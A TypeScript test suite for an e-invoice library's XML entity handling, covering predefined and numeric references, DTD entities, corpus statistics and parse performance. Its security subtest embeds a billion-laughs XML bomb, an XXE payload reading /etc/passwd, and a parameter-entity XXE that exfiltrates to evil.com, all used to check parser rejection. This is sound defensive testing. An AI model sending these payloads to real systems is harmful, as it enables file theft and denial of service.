486 lines
16 KiB
TypeScript
486 lines
16 KiB
TypeScript
import { expect, tap } from '@git.zone/tstest/tapbundle';
|
||
import * as einvoice from '../../../ts/index.js';
|
||
import * as plugins from '../../plugins.js';
|
||
import { CorpusLoader } from '../../helpers/corpus.loader.js';
|
||
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
|
||
|
||
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
|
||
const performanceTracker = new PerformanceTracker('PARSE-09');
|
||
|
||
// Parses a small invoice document once per predefined XML entity reference
// (&amp; &lt; &gt; &quot; &apos;), placing the reference in both element text
// and an attribute value, and logs whether EInvoice.fromXmlString accepted it.
// Parse failures are logged, not rethrown, so this sub-test is informational.
await t.test('Predefined XML entities', async () => {
  performanceTracker.startOperation('predefined-entities');

  // `entity` is the escaped reference as it must be written in XML source;
  // `character` is the literal character that reference stands for.
  const predefinedEntities = [
    {
      name: 'Ampersand',
      entity: '&amp;',
      character: '&',
      description: 'Used in company names and text'
    },
    {
      name: 'Less than',
      entity: '&lt;',
      character: '<',
      description: 'Used in text content'
    },
    {
      name: 'Greater than',
      entity: '&gt;',
      character: '>',
      description: 'Used in text content'
    },
    {
      name: 'Quote',
      entity: '&quot;',
      character: '"',
      description: 'Used in attribute values'
    },
    {
      name: 'Apostrophe',
      entity: '&apos;',
      character: "'",
      description: 'Used in attribute values'
    }
  ];

  for (const entity of predefinedEntities) {
    const startTime = performance.now();

    // The reference is interpolated un-decoded so the parser has to resolve it.
    const testXml = `<?xml version="1.0"?>
<invoice>
  <supplier>Test ${entity.entity} Company</supplier>
  <note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>
</invoice>`;

    console.log(`${entity.name} entity (${entity.entity}):`);
    console.log(` Character: "${entity.character}"`);
    console.log(` Usage: ${entity.description}`);

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(testXml);
        console.log(' ✓ Entity resolved correctly');
      } else {
        console.log(' ⚠️ Cannot test without fromXmlString');
      }
    } catch (error) {
      // A thrown value is not guaranteed to be an Error instance.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` ✗ Error: ${message}`);
    }

    performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('predefined-entities');
});
|
||
|
||
// Checks that decimal (&#NNN;) and hexadecimal (&#xHHH;) character references
// decode to the expected character. Decoding is done locally with
// String.fromCodePoint; the e-invoice parser itself is not exercised here.
await t.test('Numeric character references', async () => {
  performanceTracker.startOperation('numeric-entities');

  // Decodes one numeric character reference; returns null when `ref` is not
  // of the form &#NNN; or &#xHHH;. May throw RangeError for an out-of-range
  // code point (String.fromCodePoint behaviour).
  const decodeNumericReference = (ref: string): string | null => {
    const match = /^&#(?:x([0-9A-Fa-f]+)|(\d+));$/.exec(ref);
    if (match === null) {
      return null;
    }
    const codePoint = match[1] !== undefined
      ? Number.parseInt(match[1], 16)
      : Number.parseInt(match[2], 10);
    return String.fromCodePoint(codePoint);
  };

  const numericTests = [
    {
      name: 'Decimal references',
      tests: [
        { ref: '&#65;', char: 'A', description: 'Latin capital A' },
        { ref: '&#8364;', char: '€', description: 'Euro sign' },
        { ref: '&#169;', char: '©', description: 'Copyright symbol' },
        { ref: '&#8482;', char: '™', description: 'Trademark symbol' },
        { ref: '&#176;', char: '°', description: 'Degree symbol' }
      ]
    },
    {
      name: 'Hexadecimal references',
      tests: [
        { ref: '&#x41;', char: 'A', description: 'Latin capital A (hex)' },
        { ref: '&#x20AC;', char: '€', description: 'Euro sign (hex)' },
        { ref: '&#xA9;', char: '©', description: 'Copyright (hex)' },
        { ref: '&#x2122;', char: '™', description: 'Trademark (hex)' },
        { ref: '&#xB0;', char: '°', description: 'Degree (hex)' }
      ]
    }
  ];

  for (const category of numericTests) {
    console.log(`\n${category.name}:`);

    for (const test of category.tests) {
      const startTime = performance.now();

      const xml = `<?xml version="1.0"?>
<invoice>
  <amount currency="${test.ref}EUR">100.00</amount>
  <temperature>${test.ref}C</temperature>
  <copyright>${test.ref} 2024</copyright>
</invoice>`;

      console.log(` ${test.ref} = "${test.char}" (${test.description})`);

      let decoded: string | null = null;
      try {
        // Verify entity resolution: decode the reference, substitute it into
        // the document, and confirm no un-resolved reference is left behind.
        decoded = decodeNumericReference(test.ref);
        const resolved = xml.split(test.ref).join(decoded ?? test.ref);
        if (
          decoded === test.char &&
          resolved.includes(test.char) &&
          !resolved.includes(test.ref)
        ) {
          console.log(' ✓ Entity would resolve correctly');
        }
      } catch (error) {
        const message = error instanceof Error ? error.message : String(error);
        console.log(` ✗ Resolution error: ${message}`);
      }

      performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);

      // Fail the sub-test if the reference did not decode to the expected character.
      expect(decoded).toEqual(test.char);
    }
  }

  performanceTracker.endOperation('numeric-entities');
});
|
||
|
||
// Feeds documents that declare their own entities in an internal DTD subset
// (general entities, an external parameter entity, and nested references) to
// EInvoice.fromXmlString and logs the outcome. Both acceptance and rejection
// are treated as informational; nothing is asserted.
await t.test('Custom entity definitions (DTD)', async () => {
  performanceTracker.startOperation('custom-entities');

  // Each case carries its XML plus optional metadata that is only used for
  // logging: `entities` (declared name -> value), `description`, `expected`.
  const customEntityTests = [
    {
      name: 'Internal DTD entities',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY company "Acme Corporation">
  <!ENTITY address "123 Main Street, London">
  <!ENTITY year "2024">
  <!ENTITY currency "EUR">
]>
<invoice>
  <supplier>&company;</supplier>
  <supplierAddress>&address;</supplierAddress>
  <date>01-01-&year;</date>
  <amount currency="&currency;">1000.00</amount>
</invoice>`,
      entities: {
        'company': 'Acme Corporation',
        'address': '123 Main Street, London',
        'year': '2024',
        'currency': 'EUR'
      }
    },
    {
      name: 'Parameter entities',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY % common SYSTEM "common.dtd">
  %common;
  <!ENTITY company "Test Company">
]>
<invoice>
  <supplier>&company;</supplier>
</invoice>`,
      description: 'External parameter entities (security risk)'
    },
    {
      name: 'Nested entity references',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY city "London">
  <!ENTITY country "UK">
  <!ENTITY fullAddress "&city;, &country;">
]>
<invoice>
  <address>&fullAddress;</address>
</invoice>`,
      expected: 'London, UK'
    }
  ];

  for (const test of customEntityTests) {
    const startTime = performance.now();

    console.log(`\n${test.name}:`);

    if (test.entities) {
      console.log(' Defined entities:');
      for (const [name, value] of Object.entries(test.entities)) {
        console.log(` &${name}; = "${value}"`);
      }
    }

    if (test.description) {
      console.log(` Note: ${test.description}`);
    }

    if (test.expected) {
      console.log(` Expected result: ${test.expected}`);
    }

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        // Note: Many parsers disable DTD processing by default for security
        await invoice.fromXmlString(test.xml);
        console.log(' ✓ Parsed (DTD support may vary)');
      }
    } catch (error) {
      // A thrown value is not guaranteed to be an Error instance.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` ⚠️ DTD parsing: ${message}`);
      console.log(' Note: DTD processing often disabled for security');
    }

    performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
  }

  performanceTracker.endOperation('custom-entities');
});
|
||
|
||
// Submits three classic entity-based attack payloads (entity expansion bomb,
// external entity, parameter-entity exfiltration) to EInvoice.fromXmlString
// and logs whether the call threw. Nothing is asserted.
// NOTE(review): a successful parse is reported as a warning, but the code does
// not inspect the parsed result, so it cannot tell "entities were expanded"
// apart from "DTD was ignored" — confirm against the parser before relying on it.
await t.test('Entity security considerations', async () => {
  performanceTracker.startOperation('entity-security');

  const securityTests = [
    {
      name: 'Billion laughs attack (XML bomb)',
      xml: `<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<invoice>
  <data>&lol4;</data>
</invoice>`,
      risk: 'Exponential entity expansion',
      mitigation: 'Disable DTD processing or limit entity expansion'
    },
    {
      name: 'External entity injection (XXE)',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
  <data>&xxe;</data>
</invoice>`,
      risk: 'File disclosure, SSRF',
      mitigation: 'Disable external entity resolution'
    },
    {
      name: 'Parameter entity XXE',
      xml: `<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">
  %eval;
  %exfil;
]>
<invoice></invoice>`,
      risk: 'Out-of-band data exfiltration',
      mitigation: 'Disable parameter entities'
    }
  ];

  for (const test of securityTests) {
    console.log(`\n${test.name}:`);
    console.log(` Risk: ${test.risk}`);
    console.log(` Mitigation: ${test.mitigation}`);

    const startTime = performance.now();

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(test.xml);
        console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
      }
    } catch (error) {
      // A thrown value is not guaranteed to be an Error instance.
      const message = error instanceof Error ? error.message : String(error);
      console.log(' ✓ Parser correctly rejected dangerous entities');
      console.log(` Error: ${message}`);
    }

    performanceTracker.recordMetric('security-test', performance.now() - startTime);
  }

  performanceTracker.endOperation('entity-security');
});
|
||
|
||
// Prints a catalogue of characters that commonly need escaping in invoice
// text, alongside a reference that encodes them and the resolved character.
// Purely informational: no parsing is performed and nothing is asserted.
await t.test('Entity usage in e-invoices', async () => {
  performanceTracker.startOperation('einvoice-entities');

  // `text` is the human-readable string, `entity` the reference form, and
  // `resolved` the character(s) the reference stands for. Characters without
  // a predefined XML entity are written as numeric character references.
  const einvoicePatterns = [
    {
      name: 'Currency symbols',
      examples: [
        { text: 'Price in € (EUR)', entity: '&#8364;', resolved: '€' },
        { text: 'Amount in £ (GBP)', entity: '&#163;', resolved: '£' },
        { text: 'Cost in $ (USD)', entity: '&#36;', resolved: '$' },
        { text: 'Price in ¥ (JPY)', entity: '&#165;', resolved: '¥' }
      ]
    },
    {
      name: 'Special characters in company names',
      examples: [
        { text: 'Smith & Jones Ltd.', entity: '&amp;', resolved: '&' },
        { text: 'AT&T Communications', entity: '&amp;', resolved: '&' },
        { text: "L'Oréal Paris", entity: '&apos;', resolved: "'" },
        { text: '"Best Price" Store', entity: '&quot;', resolved: '"' }
      ]
    },
    {
      name: 'Legal symbols',
      examples: [
        { text: 'Copyright © 2024', entity: '&#169;', resolved: '©' },
        { text: 'Registered ®', entity: '&#174;', resolved: '®' },
        { text: 'Trademark ™', entity: '&#8482;', resolved: '™' }
      ]
    },
    {
      name: 'Mathematical symbols',
      examples: [
        { text: 'Temperature ±2°C', entity: '&#177;/&#176;', resolved: '±/°' },
        { text: 'Discount ≤ 50%', entity: '&#8804;', resolved: '≤' },
        { text: 'Quantity × Price', entity: '&#215;', resolved: '×' }
      ]
    }
  ];

  for (const category of einvoicePatterns) {
    console.log(`\n${category.name}:`);

    for (const example of category.examples) {
      console.log(` "${example.text}"`);
      console.log(` Entity: ${example.entity} → ${example.resolved}`);
    }
  }

  performanceTracker.endOperation('einvoice-entities');
});
|
||
|
||
// Scans up to 100 corpus files and reports how many contain predefined entity
// references, numeric character references, or DTD / entity declarations.
// Detection is by plain substring / regex search on the raw file text.
await t.test('Corpus entity analysis', async () => {
  performanceTracker.startOperation('corpus-entities');

  const corpusLoader = new CorpusLoader();
  const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);

  console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);

  const entityStats = {
    total: 0,
    filesWithEntities: 0,
    predefinedEntities: new Map<string, number>(),
    numericEntities: 0,
    customEntities: 0,
    dtdFiles: 0,
    unreadableFiles: 0
  };

  // The five predefined XML entity references, searched for in escaped form.
  const predefined = ['&amp;', '&lt;', '&gt;', '&quot;', '&apos;'];
  const numericReferencePattern = /&#\d+;|&#x[\dA-Fa-f]+;/;

  const sampleSize = Math.min(100, xmlFiles.length);
  const sampledFiles = xmlFiles.slice(0, sampleSize);

  for (const file of sampledFiles) {
    // Counted before reading, so unreadable files are still part of the total.
    entityStats.total++;

    try {
      const content = await plugins.fs.readFile(file.path, 'utf8');
      let hasEntities = false;

      // Check for predefined entities (counted once per file per entity)
      for (const entity of predefined) {
        if (content.includes(entity)) {
          hasEntities = true;
          entityStats.predefinedEntities.set(
            entity,
            (entityStats.predefinedEntities.get(entity) || 0) + 1
          );
        }
      }

      // Check for numeric entities
      if (numericReferencePattern.test(content)) {
        hasEntities = true;
        entityStats.numericEntities++;
      }

      // Check for DTD; only an <!ENTITY declaration counts as a custom entity
      const declaresEntity = content.includes('<!ENTITY');
      if (content.includes('<!DOCTYPE') || declaresEntity) {
        entityStats.dtdFiles++;
      }
      if (declaresEntity) {
        entityStats.customEntities++;
      }

      if (hasEntities) {
        entityStats.filesWithEntities++;
      }
    } catch (error) {
      // Skip files that can't be read, but keep a count so it is visible.
      entityStats.unreadableFiles++;
    }
  }

  // Avoid NaN% when the corpus yielded no files.
  const entityShare = entityStats.total > 0
    ? (entityStats.filesWithEntities / entityStats.total * 100).toFixed(1)
    : '0.0';

  console.log('\nEntity Usage Statistics:');
  console.log(`Files analyzed: ${entityStats.total}`);
  console.log(`Files with entities: ${entityStats.filesWithEntities} (${entityShare}%)`);
  if (entityStats.unreadableFiles > 0) {
    console.log(`Files skipped (unreadable): ${entityStats.unreadableFiles}`);
  }

  console.log('\nPredefined entities:');
  for (const [entity, count] of entityStats.predefinedEntities.entries()) {
    console.log(` ${entity}: ${count} files`);
  }

  console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
  console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
  console.log(`Custom entities: ${entityStats.customEntities} files`);

  performanceTracker.endOperation('corpus-entities');
});
|
||
|
||
// Times EInvoice.fromXmlString on generated documents of increasing size,
// where every field contains three entity references, and logs the parse time
// and a references-per-millisecond figure. Errors are logged, not rethrown.
await t.test('Entity resolution performance', async () => {
  performanceTracker.startOperation('entity-performance');

  // Generate XML with varying entity density: `entityCount` fields, each
  // holding one predefined reference and two numeric character references.
  const generateXmlWithEntities = (entityCount: number): string => {
    let xml = '<?xml version="1.0"?>\n<invoice>\n';

    for (let i = 0; i < entityCount; i++) {
      xml += ` <field${i}>Text with &amp; entity &#8364; and &#169; symbols</field${i}>\n`;
    }

    xml += '</invoice>';
    return xml;
  };

  const testSizes = [10, 100, 500, 1000];

  console.log('\nEntity resolution performance:');

  for (const size of testSizes) {
    const xml = generateXmlWithEntities(size);
    const xmlSize = Buffer.byteLength(xml, 'utf8');
    const entityCount = size * 3; // 3 entities per field

    const startTime = performance.now();

    try {
      const invoice = new einvoice.EInvoice();
      if (invoice.fromXmlString) {
        await invoice.fromXmlString(xml);
      }

      const parseTime = performance.now() - startTime;
      // Guard against a zero elapsed time, which would print "Infinity".
      const throughput = parseTime > 0 ? (entityCount / parseTime).toFixed(1) : 'n/a';

      console.log(` ${entityCount} entities (${(xmlSize / 1024).toFixed(1)}KB):`);
      console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
      console.log(` Entities/ms: ${throughput}`);

      performanceTracker.recordMetric(`entities-${size}`, parseTime);
    } catch (error) {
      // A thrown value is not guaranteed to be an Error instance.
      const message = error instanceof Error ? error.message : String(error);
      console.log(` Error with ${size} entities: ${message}`);
    }
  }

  performanceTracker.endOperation('entity-performance');
});
|
||
|
||
// Performance summary: prints whatever the tracker's getSummary() returns.
console.log('\n' + performanceTracker.getSummary());

// Entity handling best practices (static reminder text for the test log)
console.log('\nEntity Reference Resolution Best Practices:');
console.log('1. Always handle predefined XML entities (&amp; &lt; &gt; &quot; &apos;)');
console.log('2. Support numeric character references (decimal and hex)');
console.log('3. Be cautious with DTD processing (security risks)');
console.log('4. Disable external entity resolution by default');
console.log('5. Limit entity expansion depth to prevent attacks');
console.log('6. Validate resolved content after entity expansion');
console.log('7. Consider entity usage impact on performance');
console.log('8. Document security settings clearly for users');
|
||
});
|
||
|
||
// Kick off execution of the tests registered above.
tap.start();